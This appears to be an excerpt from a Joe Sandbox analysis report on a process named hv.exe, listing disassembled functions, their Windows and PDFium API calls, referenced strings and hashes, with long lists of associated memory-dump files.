Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd

Similarity

API ID: ExclusiveFreeLockVirtual$AcquireRelease
String ID: ..\base\allocator\partition_allocator\page_allocator_internals_win.h$..\base\allocator\partition_allocator\page_allocator_internals_win.h(100) PA_NOTREACHED() hit.$VirtualFree(reinterpret_cast<void*>(address), 0, 0x00008000)
API String ID: 448536242-2024906012
Opcode ID: 3311baa090f3df800ed313d266bce9312a5b9b39624eec26067addbeff0befb5
Instruction ID: bb07afdd91c49a22993dadcfa3e15e9831488bc5a9a154653d9d9e95ccb3f37b
Opcode Fuzzy Hash: 3311baa090f3df800ed313d266bce9312a5b9b39624eec26067addbeff0befb5
Instruction Fuzzy Hash: 4A2108707402857BEF105BE59C4CB6E33BAEB85748F108418ED295BB80CB39A95B86D6

Function 6CBEFF50 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 114
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FormatMessageA.KERNEL32(00001200,00000000,?,00000000,?,00000100,00000000), ref: 6CBF0092
GetLastError.KERNEL32(?,00000100,00000000), ref: 6CBF0127

Part of subcall function 6CBF1020: _strlen.LIBCMT ref: 6CBF102D
Part of subcall function 6CBF1020: ___from_strstr_to_strchr.LIBCMT ref: 6CBF1049

Strings

%s (0x%x), xrefs: 6CBF011D
Error (0x%x) while retrieving error. (0x%x), xrefs: 6CBF01A9
, xrefs: 6CBF00A0

Memory Dump Source

Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd

Similarity

API ID: ErrorFormatLastMessage___from_strstr_to_strchr_strlen
String ID: $%s (0x%x)$Error (0x%x) while retrieving error. (0x%x)
API String ID: 335798620-593883576
Opcode ID: 2a7134081f4e1908799e151c96940a16f4911c87373615ac04992504d992aebc
Instruction ID: 881c5f4b4e4e2eccc5f69505b798e0c3fd113ffc26a9804999cd0374b89366f6
Opcode Fuzzy Hash: 2a7134081f4e1908799e151c96940a16f4911c87373615ac04992504d992aebc
Instruction Fuzzy Hash: CD51EEB1D187C595E3318B1488867FBF7E4BBEE324F201B1EE9D885951EBF442848782

Function 6CD38C2A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,0782F61A,6CBF37B1,?,00000000,6CD5939C,000000FF,?,6CD38CEB,6CBF37B1,?,6CD38D87,6CBF37B1), ref: 6CD38C5F
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CD38C71
FreeLibrary.KERNEL32(00000000,?,00000000,6CD5939C,000000FF,?,6CD38CEB,6CBF37B1,?,6CD38D87,6CBF37B1), ref: 6CD38C93

Strings

CorExitProcess, xrefs: 6CD38C69
mscoree.dll, xrefs: 6CD38C58

Memory Dump Source

Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9c791107532ac9f105c21b721d2b0f7425f46213bd2cfc745ebd0f197912f2ac
Instruction ID: 2117443847690b7799f7e28748f40931730a26ef0e2e4ad48b450ef4e0228cdc
Opcode Fuzzy Hash: 9c791107532ac9f105c21b721d2b0f7425f46213bd2cfc745ebd0f197912f2ac
Instruction Fuzzy Hash: A0016271A15665EFDF118F90CC04FAEB7B8FB45715F140626F825E2A90DB799900CA90

Function 6CBF0310 Relevance: 7.6, APIs: 5, Instructions: 80
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(?), ref: 6CBF0336
GetStdHandle.KERNEL32(000000F4), ref: 6CBF0340
WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 6CBF0368
GetStdHandle.KERNEL32(000000F4), ref: 6CBF03A5
WriteFile.KERNEL32(00000000,6CD7E540,6CD7E541,?,00000000), ref: 6CBF03CC

Memory Dump Source

Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd

Similarity

API ID: FileHandleWrite$lstrlen
String ID:
API String ID: 1181780142-0
Opcode ID: 76ebe13b8d4e6239688ebcd4be390a41d7d995fa3b2d1b119fe7c9f341ef1b80
Instruction ID: 0a5b727599a94c89ae4324de672b72669af6dc1f1aef0636cd01e75658d4d096
Opcode Fuzzy Hash: 76ebe13b8d4e6239688ebcd4be390a41d7d995fa3b2d1b119fe7c9f341ef1b80
Instruction Fuzzy Hash: DC219571B1828A5FEB10CB69DCC4BBF77B8EB05358F540114E82597790E774990986A2

Function 6CBEFD70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6CBF0FD0: _strlen.LIBCMT ref: 6CBF0FDD
Part of subcall function 6CBF0FD0: ___from_strstr_to_strchr.LIBCMT ref: 6CBF0FF9

_strlen.LIBCMT ref: 6CBEFE1E

Strings

VERBOSE, xrefs: 6CBEFDBE
UNKNOWN, xrefs: 6CBEFDA1, 6CBEFDB4
)] , xrefs: 6CBEFE0C

Memory Dump Source

Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd

Similarity

API ID: _strlen$___from_strstr_to_strchr
String ID: )] $UNKNOWN$VERBOSE
API String ID: 3974054854-3915483136
Opcode ID: cf8420bdca2efa4e9f42d2806392489250ef975558879da39cb6c584873d54f9
Instruction ID: 2dae40c5c6fa7a501d7362a23001742b7861a1d285e47e3cf672ef87f2ebd883
Opcode Fuzzy Hash: cf8420bdca2efa4e9f42d2806392489250ef975558879da39cb6c584873d54f9
Instruction Fuzzy Hash: D611B6717001C86BEF115B71AD90DEF7796EBC1658B048929E8258BB60EFB09D0E87E1

Function 6CBF21E0 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNEL32(?,?,00004000), ref: 6CBF2202
GetLastError.KERNEL32 ref: 6CBF220C

Strings

..\base\allocator\partition_allocator\page_allocator_internals_win.h, xrefs: 6CBF2228
static_cast<uint32_t>(0L) == GetLastError(), xrefs: 6CBF221E

Memory Dump Source

Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd

Similarity

API ID: ErrorFreeLastVirtual
String ID: ..\base\allocator\partition_allocator\page_allocator_internals_win.h$static_cast<uint32_t>(0L) == GetLastError()
API String ID: 499627090-2617910450
Opcode ID: b5247e443cbfeaee9f8cb1d86de1eee49d37efa1ec7e77836ca761dc4854c550
Instruction ID: f7562879aa2b26149b3fae45421786d0769d4f87469403d62e6679e2762e5218
Opcode Fuzzy Hash: b5247e443cbfeaee9f8cb1d86de1eee49d37efa1ec7e77836ca761dc4854c550
Instruction Fuzzy Hash: F8F02B30B0024427EF049B61D855BEE3775EF89B98F004018ED195B780CB34AA09C6D5

Function 6CD2B5D7 Relevance: 6.0, APIs: 4, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,6CD2B53C,00000064), ref: 6CD2B5FA
LeaveCriticalSection.KERNEL32(6CF3B680,?,?,6CD2B53C,00000064,?,?,?,6CAFDE08,6CF35B00,?,6CAFE9A6), ref: 6CD2B604
WaitForSingleObjectEx.KERNEL32(?,00000000,?,6CD2B53C,00000064,?,?,?,6CAFDE08,6CF35B00,?,6CAFE9A6), ref: 6CD2B615
EnterCriticalSection.KERNEL32(6CF3B680,?,6CD2B53C,00000064,?,?,?,6CAFDE08,6CF35B00,?,6CAFE9A6), ref: 6CD2B61C

Memory Dump Source

Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: 9c5b85b1b78897e7e00a423e311135b34f227cb049d12ed17c7de2f0a72357f7
Instruction ID: 591b029966add3cbb20ad40fa62a5d92989d1d6e5b172aae4af82cea2a37efd1
Opcode Fuzzy Hash: 9c5b85b1b78897e7e00a423e311135b34f227cb049d12ed17c7de2f0a72357f7
Instruction Fuzzy Hash: BAE09231B21938FBCF611F91CC29F9D3F36FB06751B051980F94D66511CB6958109BD8

Function 6CBD2460 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

FPDFPageObj_GetType.IEPDF32(?), ref: 6CBD248D
FPDFPageObj_GetType.IEPDF32(?,?,?), ref: 6CBD263A

Strings

Rect, xrefs: 6CBD26D7
Subtype, xrefs: 6CBD2530
Link, xrefs: 6CBD2548

Memory Dump Source

Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd

Similarity

API ID: Obj_PageType
String ID: Link$Rect$Subtype
API String ID: 1809354570-3862875103
Opcode ID: d150a150c4168c7299fd861a39154d0a76ac76e727c5d64d8502b260d46ab1ca
Instruction ID: a1957f6c34e14ceed69eaca6ada472df97cdc2426c9d8cd598bcc9446358a0c0
Opcode Fuzzy Hash: d150a150c4168c7299fd861a39154d0a76ac76e727c5d64d8502b260d46ab1ca
Instruction Fuzzy Hash: 4351C435B112998FDF10CF68C994AAE7BB5FF48708B110069E91A9B741DB31FD05CBA2

Function 6CBCC670 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

FPDFAnnot_GetSubtype.IEPDF32(?), ref: 6CBCC6A5

Strings

Subtype, xrefs: 6CBCCCDB
Highlight, xrefs: 6CBCCCF0

Memory Dump Source

Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd

Similarity

API ID: Annot_Subtype
String ID: Highlight$Subtype
API String ID: 2863784842-3181136990
Opcode ID: 141b6d4cda3139464e8d62ca94a406d563499cd022a250994b97acc1061fb0cf
Instruction ID: 2f8b63a49410f8b03285d1c556fc17bb8bbd5d8167c70fbc3ddd6383bed3206b
Opcode Fuzzy Hash: 141b6d4cda3139464e8d62ca94a406d563499cd022a250994b97acc1061fb0cf
Instruction Fuzzy Hash: DD212772F0011D9FEB149E758880A7B7369EFA8618F110929DA295FB90E730E806C7D3

Analysis Process: hv.exePID: 7960, Parent PID: 7940COMMON

Non-executed Functions

Function 6C3B2330 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 390COMMON

Download Yara Rule

APIs

#214.IEPDF32(?), ref: 6C3B248D
#214.IEPDF32(?,?,?), ref: 6C3B263A

Strings

Rect, xrefs: 6C3B26D7
Subtype, xrefs: 6C3B2530
Link, xrefs: 6C3B2548

Memory Dump Source

Source File: 00000003.00000002.1546421268.000000006C386000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2D0000, based on PE: true

Associated: 00000003.00000002.1546395387.000000006C2D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C2D1000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C2DA000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C414000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C443000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C447000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1546421268.000000006C456000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C53A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C55B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C565000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5E6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5EE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5F2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C62F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C666000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C67C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C695000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6BA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C6FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C703000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C707000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1553119306.000000006C70B000.00000002.00000001.01000000.00000009.sdmpDownload File
